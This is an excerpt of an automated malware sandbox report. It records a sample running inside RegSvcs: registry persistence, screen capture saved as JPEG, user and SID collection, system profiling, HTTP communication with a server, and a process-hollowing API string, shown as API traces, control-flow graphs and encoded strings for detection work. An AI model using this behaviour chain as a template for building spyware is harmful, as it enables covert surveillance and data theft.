__ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34870 410ac8 34866->34870 34872 4106d6 _Ref_count_obj 34867->34872 34869->34866 34870->34752 34873 423340 70 API calls 34872->34873 34874 41073e 34873->34874 34875 4061f0 114 API calls 34874->34875 34876 410749 34875->34876 34877 423340 70 API calls 34876->34877 34878 410762 34877->34878 34879 4061f0 114 API calls 34878->34879 34880 41076d HttpSendRequestA 34879->34880 34882 410790 _Ref_count_obj 34880->34882 34883 410818 InternetReadFile 34882->34883 34884 41083f _Yarn 34883->34884 34885 4108bf InternetReadFile 34884->34885 34885->34884 34894 409c7c _Ref_count_obj 34886->34894 34895 409d43 _Ref_count_obj 34886->34895 34887 409e0a 34903 424760 27 API calls 34887->34903 34888 424250 27 API calls 34888->34894 34890 409de3 _Ref_count_obj 34892 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34890->34892 34891 409e0f 34893 42f02c 25 API calls 34891->34893 34896 409e06 34892->34896 34897 409e14 34893->34897 34894->34887 34894->34888 34894->34891 34894->34895 34895->34890 34895->34891 34896->34760 34896->34761 34898->34826 34899->34834 34900->34791

                                                      Executed Functions

                                                      Function 004061F0 Relevance: 99.7, APIs: 40, Strings: 16, Instructions: 1737registrywindowfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 0040639C
                                                      • RegQueryValueExA.KERNELBASE(A99F1BC9,?,00000000,00000000,?,00000400,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063CA
                                                      • RegCloseKey.KERNELBASE(A99F1BC9,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063D6
                                                      • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 004064E3
                                                      • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00406511
                                                      • RegCloseKey.ADVAPI32(80000001), ref: 0040651A
                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0040663C
                                                      • RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0040665F
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 004067BD
                                                        • Part of subcall function 004061F0: RegQueryInfoKeyW.ADVAPI32 ref: 00406894
                                                        • Part of subcall function 004061F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 004068E0
                                                      • RegCloseKey.ADVAPI32(80000002), ref: 00406668
                                                      • RegCloseKey.ADVAPI32(?), ref: 00406D5E
                                                      • GdiplusStartup.GDIPLUS(?,?,00000000,A99F1BC9,00000000), ref: 00406DEA
                                                      • GetDC.USER32 ref: 00406F62
                                                      • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004071CD
                                                      • GetSystemMetrics.USER32(00000000), ref: 00407226
                                                      • GetSystemMetrics.USER32(00000000), ref: 0040722F
                                                      • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 00407277
                                                      • GetSystemMetrics.USER32(00000001), ref: 004072CA
                                                      • GetSystemMetrics.USER32(00000001), ref: 004072D3
                                                      • CreateCompatibleDC.GDI32(?), ref: 004072DF
                                                      • CreateCompatibleBitmap.GDI32 ref: 004072F4
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00407304
                                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0040732A
                                                      • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 0040733E
                                                      • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 0040735A
                                                      • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00407387
                                                      • GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 0040740E
                                                      • SelectObject.GDI32(00000000,?), ref: 0040741B
                                                      • DeleteObject.GDI32 ref: 00407428
                                                      • DeleteObject.GDI32 ref: 00407430
                                                      • ReleaseDC.USER32(00000000,?), ref: 0040743A
                                                      • GdipDisposeImage.GDIPLUS(00000000), ref: 00407441
                                                      • GdiplusShutdown.GDIPLUS(?), ref: 004074E3
                                                      • GetUserNameA.ADVAPI32 ref: 004075BA
                                                      • LookupAccountNameA.ADVAPI32 ref: 00407600
                                                      • GetSidIdentifierAuthority.ADVAPI32(?), ref: 0040760D
                                                      • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407721
                                                      • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00407748
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                                                      • String ID: $($JNQu7I==$LNKu7I==$MypyFvpRFOk=$MypyFvpRFXY=$MypyFvpRFeI=$MypyFvpRFeM=$NtUnmapViewOfSection$UtPn5zJk$VhamSOYAKv==$XypyFvp=$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                      • API String ID: 1729688432-3865892106
                                                      • Opcode ID: dd4e930bae907b470c58cdb3144f96f2cf78295685fe69f6e875f319f5d3e0da
                                                      • Instruction ID: 1abf1203684e5725369dd6c775d85895287d1c8d53bdd134cb033388427fe81f
                                                      • Opcode Fuzzy Hash: dd4e930bae907b470c58cdb3144f96f2cf78295685fe69f6e875f319f5d3e0da
                                                      • Instruction Fuzzy Hash: BED22571A001189BDB14DF28CD85BDDBB75EF45304F5082AEF809A72D2DB389A94CF99
                                                      Function 0040B700 Relevance: 32.7, APIs: 12, Strings: 6, Instructions: 1232COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040A270: GetTempPathA.KERNEL32(00000104,?,A99F1BC9,?,00000000), ref: 0040A2B7
                                                      • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0040B77B
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 0040639C
                                                        • Part of subcall function 004061F0: RegQueryValueExA.KERNELBASE(A99F1BC9,?,00000000,00000000,?,00000400,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063CA
                                                        • Part of subcall function 004061F0: RegCloseKey.KERNELBASE(A99F1BC9,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063D6
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040B8B5
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040B9EF
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 004064E3
                                                        • Part of subcall function 004061F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00406511
                                                        • Part of subcall function 004061F0: RegCloseKey.ADVAPI32(80000001), ref: 0040651A
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040BB29
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040BC63
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0040663C
                                                        • Part of subcall function 004061F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0040665F
                                                        • Part of subcall function 004061F0: RegCloseKey.ADVAPI32(80000002), ref: 00406668
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040BD9D
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040BED7
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 004067BD
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040C011
                                                        • Part of subcall function 004061F0: RegQueryInfoKeyW.ADVAPI32 ref: 00406894
                                                        • Part of subcall function 004061F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 004068E0
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040C14B
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040C285
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040C3BF
                                                        • Part of subcall function 004061F0: RegCloseKey.ADVAPI32(?), ref: 00406D5E
                                                      • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0040C4FF
                                                        • Part of subcall function 004093D0: GetVersionExW.KERNEL32(0000011C,A99F1BC9,74DF0F00), ref: 0040944A
                                                        • Part of subcall function 004093D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004094AB
                                                        • Part of subcall function 004093D0: GetProcAddress.KERNEL32(00000000), ref: 004094B2
                                                        • Part of subcall function 004093D0: GetNativeSystemInfo.KERNELBASE(?), ref: 00409573
                                                        • Part of subcall function 004093D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409577
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
                                                      • String ID: QQOJ$QSOr6et=$QXYv5UGm$RQCHOs==$ThYA7yYl$UXYy4yYq
                                                      • API String ID: 3951112935-997252642
                                                      • Opcode ID: 60f4cf93c0276b7fde3b0be49ab871fb8c7d27612ddd5aa59fc6009b65d4f455
                                                      • Instruction ID: f22fc8433aec9f4319cb189039e98dccb5235e087b45ad788ffb1db5e1f2873b
                                                      • Opcode Fuzzy Hash: 60f4cf93c0276b7fde3b0be49ab871fb8c7d27612ddd5aa59fc6009b65d4f455
                                                      • Instruction Fuzzy Hash: B592F271A00104DBEF18DBB8CD857DDBB72AB46314F64822EE410B73D6D77E5A808B5A
                                                      Function 0040E8D0 Relevance: 25.3, APIs: 7, Strings: 7, Instructions: 764comCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1323 40e8d0-40e94a GetUserNameA 1324 40e951-40e956 1323->1324 1324->1324 1325 40e958-40ec5c call 424250 call 426270 call 426610 call 426270 call 426610 call 423340 call 426270 call 426610 call 426270 call 426610 call 426270 call 426610 CoInitialize 1324->1325 1350 40ec87 1325->1350 1351 40ec5e-40ec7b CoCreateInstance 1325->1351 1354 40ec89-40ec92 1350->1354 1352 40ec81 CoUninitialize 1351->1352 1353 40f00d-40f033 1351->1353 1352->1350 1362 40f039-40f03e 1353->1362 1363 40f0de-40f1b1 call 42b650 call 431df3 call 42ecf7 call 402400 1353->1363 1355 40ec94-40eca9 1354->1355 1356 40ecc9-40ecef 1354->1356 1358 40ecab-40ecb9 1355->1358 1359 40ecbf-40ecc6 call 42a036 1355->1359 1360 40ecf1-40ed06 1356->1360 1361 40ed26-40ed4c 1356->1361 1358->1359 1364 40f48d call 42f02c 1358->1364 1359->1356 1366 40ed08-40ed16 1360->1366 1367 40ed1c-40ed23 call 42a036 1360->1367 1368 40ed83-40eda9 1361->1368 1369 40ed4e-40ed63 1361->1369 1362->1350 1374 40f044-40f053 1362->1374 1465 40f1b4-40f1b9 1363->1465 1385 40f492 call 42f02c 1364->1385 1366->1364 1366->1367 1367->1361 1372 40edda-40edfe 1368->1372 1373 40edab-40edba 1368->1373 1370 40ed65-40ed73 1369->1370 1371 40ed79-40ed80 call 42a036 1369->1371 1370->1364 1370->1371 1371->1368 1382 40ee00-40ee15 1372->1382 1383 40ee35-40ee5b 1372->1383 1379 40edd0-40edd7 call 42a036 1373->1379 1380 40edbc-40edca 1373->1380 1400 40f055-40f067 CoUninitialize 1374->1400 1401 40f06c-40f0d9 CoUninitialize call 423340 * 4 call 40e8d0 1374->1401 1379->1372 1380->1364 1380->1379 1391 40ee17-40ee25 1382->1391 1392 40ee2b-40ee32 call 42a036 1382->1392 1386 40ee92-40eeb8 1383->1386 1387 40ee5d-40ee72 1383->1387 1394 40f497 call 42f02c 1385->1394 1397 40eee9-40ef0a 1386->1397 1398 40eeba-40eec9 1386->1398 1395 40ee74-40ee82 1387->1395 1396 40ee88-40ee8f call 42a036 1387->1396 1391->1364 1391->1392 1392->1383 1412 40f49c-40f4a1 call 42f02c 1394->1412 1395->1364 1395->1396 1396->1386 1408 40ef38-40ef50 1397->1408 1409 40ef0c-40ef18 1397->1409 1406 40eecb-40eed9 1398->1406 1407 40eedf-40eee6 call 42a036 1398->1407 1400->1350 1401->1354 1406->1364 1406->1407 1407->1397 1413 40ef52-40ef5e 1408->1413 1414 40ef7e-40ef96 1408->1414 1419 40ef1a-40ef28 1409->1419 1420 40ef2e-40ef35 call 42a036 1409->1420 1424 40ef60-40ef6e 1413->1424 1425 40ef74-40ef7b call 42a036 1413->1425 1426 40efc4-40efdc 1414->1426 1427 40ef98-40efa4 1414->1427 1419->1364 1419->1420 1420->1408 1424->1364 1424->1425 1425->1414 1436 40efe2-40efee 1426->1436 1437 40f46f-40f48c call 4299c0 1426->1437 1434 40efa6-40efb4 1427->1434 1435 40efba-40efc1 call 42a036 1427->1435 1434->1364 1434->1435 1435->1426 1439 40eff4-40f002 1436->1439 1440 40f465-40f46c call 42a036 1436->1440 1439->1364 1445 40f008 1439->1445 1440->1437 1445->1440 1465->1465 1466 40f1bb-40f1fa call 424250 call 431e8f 1465->1466 1471 40f22b-40f27d call 431df3 call 42ecf7 call 402400 1466->1471 1472 40f1fc-40f20b 1466->1472 1483 40f280-40f285 1471->1483 1473 40f221-40f228 call 42a036 1472->1473 1474 40f20d-40f21b 1472->1474 1473->1471 1474->1385 1474->1473 1483->1483 1484 40f287-40f2c6 call 424250 call 431e8f 1483->1484 1489 40f2f7-40f34d call 431df3 call 42ecf7 call 402400 1484->1489 1490 40f2c8-40f2d7 1484->1490 1501 40f350-40f355 1489->1501 1491 40f2d9-40f2e7 1490->1491 1492 40f2ed-40f2f4 call 42a036 1490->1492 1491->1394 1491->1492 1492->1489 1501->1501 1502 40f357-40f396 call 424250 call 431e8f 1501->1502 1507 40f3c7-40f460 CoUninitialize 1502->1507 1508 40f398-40f3a7 1502->1508 1507->1354 1509 40f3a9-40f3b7 1508->1509 1510 40f3bd-40f3c4 call 42a036 1508->1510 1509->1412 1509->1510 1510->1507
                                                      APIs
                                                      • GetUserNameA.ADVAPI32 ref: 0040E91D
                                                      • CoInitialize.OLE32(00000000), ref: 0040EC54
                                                      • CoCreateInstance.OLE32(0045DFB0,00000000,00000001,0045E010,?), ref: 0040EC73
                                                      • CoUninitialize.OLE32 ref: 0040EC81
                                                      • CoUninitialize.OLE32 ref: 0040F055
                                                      • CoUninitialize.OLE32 ref: 0040F06C
                                                      • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F455
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Uninitialize$CreateInitializeInstanceNameUser
                                                      • String ID: @3P$DLdvEKPkEN0=$LNPPv9==$LNPvEKPk$UzYVOs==$aCG26vdmEr==$aCG26zBXEt8=
                                                      • API String ID: 1775936440-2745974841
                                                      • Opcode ID: 8dbe1dc47cfbc14bb988722cbb829c540bea7da7def1ee1fa22d68c10a15f972
                                                      • Instruction ID: d94c59ba96bf58fdea2299b4189d095cea6882005b870254fb1f8c5aa26f2192
                                                      • Opcode Fuzzy Hash: 8dbe1dc47cfbc14bb988722cbb829c540bea7da7def1ee1fa22d68c10a15f972
                                                      • Instruction Fuzzy Hash: 4062D071A002289FDF24DF24CD88BDDB7B5AF49304F5085E9E809A7291DB399B88CF55
                                                      Function 004105B0 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 312networkfilesleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1518 4105b0-4105fc 1519 410602-410606 1518->1519 1520 410a07-410a32 call 424250 1518->1520 1519->1520 1521 41060c-410610 1519->1521 1525 410a60-410a78 1520->1525 1526 410a34-410a40 1520->1526 1521->1520 1523 410616-4106b4 Sleep InternetOpenW InternetConnectA call 423340 call 4061f0 1521->1523 1553 4106b6 1523->1553 1554 4106b8-4106d4 HttpOpenRequestA 1523->1554 1530 4109be-4109d6 1525->1530 1531 410a7e-410a8a 1525->1531 1528 410a42-410a50 1526->1528 1529 410a56-410a5d call 42a036 1526->1529 1528->1529 1533 410adb-410ae0 call 42f02c 1528->1533 1529->1525 1537 4109dc-4109e8 1530->1537 1538 410aaf-410acb call 4299c0 1530->1538 1535 410a90-410a9e 1531->1535 1536 4109b4-4109bb call 42a036 1531->1536 1535->1533 1543 410aa0 1535->1543 1536->1530 1544 410aa5-410aac call 42a036 1537->1544 1545 4109ee-4109fc 1537->1545 1543->1536 1544->1538 1545->1533 1551 410a02 1545->1551 1551->1544 1553->1554 1555 410705-410774 call 423340 call 4061f0 call 423340 call 4061f0 1554->1555 1556 4106d6-4106e5 1554->1556 1570 410776 1555->1570 1571 410778-41078e HttpSendRequestA 1555->1571 1558 4106e7-4106f5 1556->1558 1559 4106fb-410702 call 42a036 1556->1559 1558->1559 1559->1555 1570->1571 1572 410790-41079f 1571->1572 1573 4107bf-4107e7 1571->1573 1574 4107a1-4107af 1572->1574 1575 4107b5-4107bc call 42a036 1572->1575 1576 4107e9-4107f8 1573->1576 1577 410818-410839 InternetReadFile 1573->1577 1574->1575 1575->1573 1579 4107fa-410808 1576->1579 1580 41080e-410815 call 42a036 1576->1580 1581 41083f 1577->1581 1579->1580 1580->1577 1584 410840-4108f0 call 42b0d0 InternetReadFile 1581->1584
                                                      APIs
                                                      • Sleep.KERNELBASE(000005DC,A99F1BC9,?,00000000), ref: 00410642
                                                      • InternetOpenW.WININET(0045DB58,00000000,00000000,00000000,00000000), ref: 00410651
                                                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00410675
                                                      • HttpOpenRequestA.WININET(?,00000000), ref: 004106BF
                                                      • HttpSendRequestA.WININET(?,00000000), ref: 0041077F
                                                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 00410831
                                                      • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 004108E0
                                                      • InternetCloseHandle.WININET(?), ref: 00410907
                                                      • InternetCloseHandle.WININET(?), ref: 0041090F
                                                      • InternetCloseHandle.WININET(?), ref: 00410917
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                      • String ID: UzYVOs==$aCG26vdmEr==$aCG26zBXEt8=$invalid stoi argument$stoi argument out of range
                                                      • API String ID: 1439999335-2534103556
                                                      • Opcode ID: 18dda18013ec16b020916997e5ab615e17d0b909853951990ecdae6b3ded0351
                                                      • Instruction ID: 2e690d232329263d9ab4458541f63023bbecdb709bd55ac3ccf9d53c9ca6ac71
                                                      • Opcode Fuzzy Hash: 18dda18013ec16b020916997e5ab615e17d0b909853951990ecdae6b3ded0351
                                                      • Instruction Fuzzy Hash: E1B1C5B16102189BDB24DF28CC84BDEBB75EF45344F5041AAF909972D2D7B89AC0CF99
                                                      Function 004093D0 Relevance: 18.0, APIs: 6, Strings: 4, Instructions: 473libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1593 4093d0-409452 call 42b650 GetVersionExW 1596 4099f6-409a13 call 4299c0 1593->1596 1597 409458-409480 call 423340 call 4061f0 1593->1597 1604 409482 1597->1604 1605 409484-4094a6 call 423340 call 4061f0 1597->1605 1604->1605 1610 4094a8 1605->1610 1611 4094aa-4094c3 GetModuleHandleA GetProcAddress 1605->1611 1610->1611 1612 4094f4-40951f 1611->1612 1613 4094c5-4094d4 1611->1613 1616 409550-409571 1612->1616 1617 409521-409530 1612->1617 1614 4094d6-4094e4 1613->1614 1615 4094ea-4094f1 call 42a036 1613->1615 1614->1615 1620 409a14 call 42f02c 1614->1620 1615->1612 1618 409573-409575 GetNativeSystemInfo 1616->1618 1619 409577 GetSystemInfo 1616->1619 1622 409532-409540 1617->1622 1623 409546-40954d call 42a036 1617->1623 1624 40957d-409586 1618->1624 1619->1624 1631 409a19-409a1f call 42f02c 1620->1631 1622->1620 1622->1623 1623->1616 1629 4095a4-4095a7 1624->1629 1630 409588-40958f 1624->1630 1632 409997-40999a 1629->1632 1633 4095ad-4095b6 1629->1633 1634 4099f1 1630->1634 1635 409595-40959f 1630->1635 1632->1634 1639 40999c-4099a5 1632->1639 1637 4095b8-4095c4 1633->1637 1638 4095c9-4095cc 1633->1638 1634->1596 1640 4099ec 1635->1640 1637->1640 1642 4095d2-4095d9 1638->1642 1643 409974-409976 1638->1643 1644 4099a7-4099ab 1639->1644 1645 4099cc-4099cf 1639->1645 1640->1634 1648 4096b9-40995d call 423340 call 4061f0 call 423340 call 4061f0 call 406320 call 423340 call 4061f0 call 4091b0 call 423340 call 4061f0 call 423340 call 4061f0 call 406320 call 423340 call 4061f0 call 4091b0 call 423340 call 4061f0 call 423340 call 4061f0 call 406320 call 423340 call 4061f0 call 4091b0 call 423340 call 4061f0 call 423340 call 4061f0 call 406320 call 423340 call 4061f0 call 4091b0 1642->1648 1649 4095df-409647 call 423340 call 4061f0 call 423340 call 4061f0 call 406320 1642->1649 1646 409984-409987 1643->1646 1647 409978-409982 1643->1647 1650 4099c0-4099ca 1644->1650 1651 4099ad-4099b2 1644->1651 1652 4099d1-4099db 1645->1652 1653 4099dd-4099e9 1645->1653 1646->1634 1654 409989-409995 1646->1654 1647->1640 1688 409963-40996c 1648->1688 1676 409649 1649->1676 1677 40964b-40966b call 431e8f 1649->1677 1650->1634 1651->1650 1656 4099b4-4099be 1651->1656 1652->1634 1653->1640 1654->1640 1656->1634 1676->1677 1683 4096a2-4096a4 1677->1683 1684 40966d-40967c 1677->1684 1683->1688 1689 4096aa-4096b4 1683->1689 1686 409692-40969f call 42a036 1684->1686 1687 40967e-40968c 1684->1687 1686->1683 1687->1631 1687->1686 1688->1632 1691 40996e 1688->1691 1689->1688 1691->1643
                                                      APIs
                                                      • GetVersionExW.KERNEL32(0000011C,A99F1BC9,74DF0F00), ref: 0040944A
                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004094AB
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004094B2
                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00409573
                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409577
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                                                      • String ID: MepAF9==$MepAGI==$MepzG9==$MepzHI==
                                                      • API String ID: 374719553-2967035976
                                                      • Opcode ID: 7181936110e7d870de8c12fa1c602ce8ffe776a14a577e8357ace3040553704a
                                                      • Instruction ID: 526a03539c261f4202bfb8ced3c8a055484567f0761060618e7847c9c87492ba
                                                      • Opcode Fuzzy Hash: 7181936110e7d870de8c12fa1c602ce8ffe776a14a577e8357ace3040553704a
                                                      • Instruction Fuzzy Hash: 37020871E00254ABDB14EB68DC5639E77719B45714F5002AEE8056B3C3EB3D4E808BCB
                                                      Function 0043E98E Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 330timeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1743 43e98e-43e9c0 call 43e55d call 43e563 call 43e5c1 1750 43e9c6-43e9d2 call 43e569 1743->1750 1751 43ec24-43ec5f call 42f049 call 43e55d call 43e563 call 43e5c1 1743->1751 1750->1751 1756 43e9d8-43e9e2 1750->1756 1782 43ec65-43ec71 call 43e569 1751->1782 1783 43ed7e-43edda call 42f049 call 446697 1751->1783 1758 43e9e4 1756->1758 1759 43ea19-43ea1b 1756->1759 1761 43e9e6-43e9ec 1758->1761 1763 43ea1e-43ea27 1759->1763 1764 43e9ee-43e9f1 1761->1764 1765 43ea0c-43ea0e 1761->1765 1763->1763 1767 43ea29-43ea3f call 4383e5 1763->1767 1768 43e9f3-43e9fb 1764->1768 1769 43ea08-43ea0a 1764->1769 1770 43ea11-43ea13 1765->1770 1777 43ec16-43ec1c call 4381b6 1767->1777 1778 43ea45-43ea60 call 4381b6 1767->1778 1768->1765 1773 43e9fd-43ea06 1768->1773 1769->1770 1770->1759 1774 43ec1d-43ec21 1770->1774 1773->1761 1773->1769 1777->1774 1789 43ea63-43ea6d 1778->1789 1782->1783 1791 43ec77-43ec83 call 43e595 1782->1791 1803 43ede4-43ede7 1783->1803 1804 43eddc-43ede2 1783->1804 1789->1789 1792 43ea6f-43ea83 call 43c669 1789->1792 1791->1783 1800 43ec89-43ecaa call 4381b6 GetTimeZoneInformation 1791->1800 1801 43ec22 1792->1801 1802 43ea89-43eadb call 42b650 * 4 call 43e947 1792->1802 1816 43ecb0-43ecd0 1800->1816 1817 43ed5b-43ed7d call 43e557 call 43e54b call 43e551 1800->1817 1801->1751 1863 43eadc-43eadf 1802->1863 1808 43ede9-43edeb 1803->1808 1809 43eded-43ee00 call 4383e5 1803->1809 1807 43ee31-43ee43 1804->1807 1812 43ee53 1807->1812 1813 43ee45-43ee48 1807->1813 1808->1807 1823 43ee02 1809->1823 1824 43ee0c-43ee25 call 446697 1809->1824 1819 43ee58-43ee6d call 4381b6 call 4299c0 1812->1819 1820 43ee53 call 43ec2f 1812->1820 1813->1812 1821 43ee4a-43ee51 call 43e98e 1813->1821 1825 43ecd2-43ecd7 1816->1825 1826 43ecda-43ece2 1816->1826 1820->1819 1821->1819 1831 43ee03-43ee0a call 4381b6 1823->1831 1848 43ee27-43ee28 1824->1848 1849 43ee2a-43ee2b call 4381b6 1824->1849 1825->1826 1833 43ecf4-43ecf6 1826->1833 1834 43ece4-43eceb 1826->1834 1853 43ee30 1831->1853 1842 43ecf8-43ed58 call 42b650 * 4 call 432a17 call 43ee6e * 2 1833->1842 1834->1833 1841 43eced-43ecf2 1834->1841 1841->1842 1842->1817 1848->1831 1849->1853 1853->1807 1865 43eae1 1863->1865 1866 43eae4-43eae7 1863->1866 1865->1866 1866->1863 1868 43eae9-43eaf7 1866->1868 1870 43eaf9 1868->1870 1871 43eafc-43eb11 call 431bc1 1868->1871 1870->1871 1877 43eb14-43eb1a 1871->1877 1879 43eb25-43eb28 1877->1879 1880 43eb1c-43eb23 1877->1880 1879->1877 1880->1879 1882 43eb2a-43eb30 1880->1882 1884 43eb36-43eb61 call 431bc1 1882->1884 1885 43ebca-43ebd1 1882->1885 1893 43eb83-43eb89 1884->1893 1894 43eb63-43eb67 1884->1894 1886 43ebd3-43ebd5 1885->1886 1887 43ebd8-43ebe9 1885->1887 1886->1887 1889 43ec05-43ec14 call 43e557 call 43e54b 1887->1889 1890 43ebeb-43ec02 call 43e947 1887->1890 1889->1777 1890->1889 1893->1885 1899 43eb8b-43ebae call 431bc1 1893->1899 1897 43eb68-43eb6e 1894->1897 1900 43eb80 1897->1900 1901 43eb70-43eb7e 1897->1901 1899->1885 1906 43ebb0-43ebb4 1899->1906 1900->1893 1901->1897 1901->1900 1907 43ebb5-43ebb8 1906->1907 1908 43ebc7 1907->1908 1909 43ebba-43ebc5 1907->1909 1908->1885 1909->1907 1909->1908
                                                      APIs
                                                      • _free.LIBCMT ref: 0043EA4B
                                                      • _free.LIBCMT ref: 0043EC17
                                                      • _free.LIBCMT ref: 0043EC8F
                                                      • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0043EE50,?,?,00000000), ref: 0043ECA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
